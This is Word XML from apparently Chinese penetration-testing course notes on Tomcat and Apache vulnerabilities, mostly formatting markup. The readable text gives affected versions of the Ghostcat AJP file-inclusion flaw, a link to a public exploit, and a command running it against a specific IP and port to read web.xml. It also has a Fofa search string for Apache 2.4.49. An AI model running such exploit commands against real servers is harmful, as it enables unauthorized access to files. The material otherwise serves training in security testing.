                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>shell代码</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>3、cve_2020_1938 文件包含</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Apache Tomcat AJP协议（默认8009端口）由于存在实现缺陷导致相关参数可控，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp目录下的任意文件。若服务器端同时存在文件上传功能，攻击者可进一步结合文件包含实现远程代码的执行。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>漏洞影响的产品版本包括：</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Tomcat 6.*</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Tomcat 7.* &lt; 7.0.100</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Tomcat 8.* &lt; 8.5.51</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>Tomcat 9.* &lt; 9.0.31</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>D:\Python27\python.exe CNVD-2020-10487-Tomcat-Ajp-lfi.py 123.58.236.76 -p 63667 -f WEB-INF/web.xml</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>4、</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>cve_2020_11996 拒绝服务</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>危害过大，权限无关，意义不大</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>5、cve_2020_9484 反序列化</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>利用条件太苛刻，意义不大</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="eavuvl"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>#</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>中间件-Fofaviewer&amp;Apache_RCE-走向高端啊</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="hnd0eb"/>
                          <w:rPr>
                            <w:rStyle w:val=""/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="lpjq4z"/>
                          </w:rPr>
                          <w:t>server="Apache/2.4.49"</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </wps:txbx>
                  <wps:bodyPr anchorCtr="false" forceAA="false" rtlCol="false" anchor="t" vertOverflow="overflow" wrap="square" spcFirstLastPara="false" compatLnSpc="true" horzOverflow="overflow" rIns="114300" lIns="400050" spcCol="0" numCol="1" rot="0" tIns="114300" fromWordArt="false" vert="horz" bIns="114300">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:spAutoFit/>
                  </wps:bodyPr>
                </wps:wsp>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="050301" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>涉及资源：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030102" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve">HYPERLINK https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr docLink \tdfn %u8865%u5145%uFF1A%u6D89%u53CA%u5F55%u50CF%u8BFE%u4EF6%u8D44%u6E90%u8F6F%u4EF6%u5305%u8D44%u6599%u7B49%u4E0B%u8F7D%u5730%u5740 \tdfu https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr \tdfe 0 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1bilxi"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>补充：涉及录像课件资源软件包资料等下载地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="16838" w:w="11905"/>
      <w:pgMar w:bottom="1361" w:right="1417" w:left="1417" w:top="1361"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:font w:name="DengXian">
    <w:altName w:val="等线"/>
    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="0004000F" w:usb3="00000000" w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016"/>
  </w:font>
  <w:font w:name="等线 Light">
    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="0004000F" w:usb3="00000000" w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016"/>
  </w:font>
  <w:font w:name="Times New Roman">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="000001FF" w:usb3="00000000" w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009"/>
  </w:font>
</w:fonts>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="0">
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="1216"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2096"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="336"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2976"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="3416"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="1656"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2536"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="776"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>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0" w:uri="http://schemas.microsoft.com/office/word" w:name="useWord2013TrackBottomHyphenation"/>
    <w:compatSetting w:val="15" w:uri="http://schemas.microsoft.com/office/word" w:name="compatibilityMode"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="differentiateMultirowTableHeaders"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="overrideTableStyleFontSizeAndJustification"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="doNotFlipMirrorIndents"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="enableOpenTypeFeatures"/>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nhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 1"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 7"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 3"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Normal (Web)"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Professional"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Plain Text"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 4"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 6"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 3"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 1"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Hashtag"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 5"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 3"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 3"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 6"/>
    <w:lsdException w:name="caption" w:qFormat="true" w:uiPriority="35" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 3"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 1"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4 Accent 5"/>
    <w:lsdException w:name="heading 9" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:qFormat="true" w:uiPriority="19" w:name="Subtle Emphasis"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 4"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="toa heading"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Date"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Hyperlink"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="E-mail Signature"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4"/>
    <w:lsdException w:name="TOC Heading" w:qFormat="true" w:uiPriority="39" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Cite"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footnote reference"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 4"/>
    <w:lsdException w:qFormat="true" w:uiPriority="10" w:name="Title"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Smart Hyperlink"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 3"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation text"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 6"/>
    <w:lsdException w:uiPriority="39" w:name="Table Grid"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text First Indent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 5"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 4"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 4"/>
    <w:lsdException w:uiPriority="43" w:name="Plain Table 3"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 1"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 5"/>
    <w:lsdException w:qFormat="true" w:uiPriority="30" w:name="Intense Quote"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3"/>
    <w:lsdException w:uiPriority="45" w:name="Plain Table 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Simple 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 2"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 4"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 1"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Outline List 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Salutation"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 5"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 1"/>
    <w:lsdException w:name="heading 8" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text 2"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="table of figures"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 8"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="annotation reference"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 1"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 2"/>
    <w:lsdException w:qFormat="true" w:uiPriority="31" w:name="Subtle Reference"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 8"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 2"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="FollowedHyperlink"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Code"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="page number"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 6"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 9"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="line number"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 5"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Block Text"/>
    <w:lsdException w:uiPriority="51" w:name="Grid Table 6 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 4"/>
    <w:lsdException w:qFormat="true" w:uiPriority="20" w:name="Emphasis"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Mention"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Smart Link"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 1"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Subtle 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent 3"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 4"/>
    <w:lsdException w:uiPriority="61" w:name="Light List"/>
    <w:lsdException w:uiPriority="47" w:name="Grid Table 2 Accent 1"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="macro"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index heading"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 1"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Note Heading"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 4"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Preformatted"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 2"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 5"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 4"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footer"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 2"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 3"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 1"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="1" w:name="Default Paragraph Font"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 4"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Continue 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Typewriter"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 3"/>
    <w:lsdException w:uiPriority="46" w:name="Grid Table 1 Light Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Variable"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text 3"/>
    <w:lsdException w:name="heading 5" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:semiHidden="true" w:name="Revision"/>
    <w:lsdException w:uiPriority="71" w:name="Colorful Shading Accent 4"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 5"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 2"/>
    <w:lsdException w:uiPriority="50" w:name="Grid Table 5 Dark Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 6"/>
    <w:lsdException w:uiPriority="52" w:name="Grid Table 7 Colorful Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 5"/>
    <w:lsdException w:name="heading 3" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="footnote text"/>
    <w:lsdException w:qFormat="true" w:uiPriority="0" w:name="Normal"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table 3D effects 3"/>
    <w:lsdException w:uiPriority="44" w:name="Plain Table 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text First Indent"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Address"/>
    <w:lsdException w:uiPriority="41" w:name="Plain Table 1"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table List 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number"/>
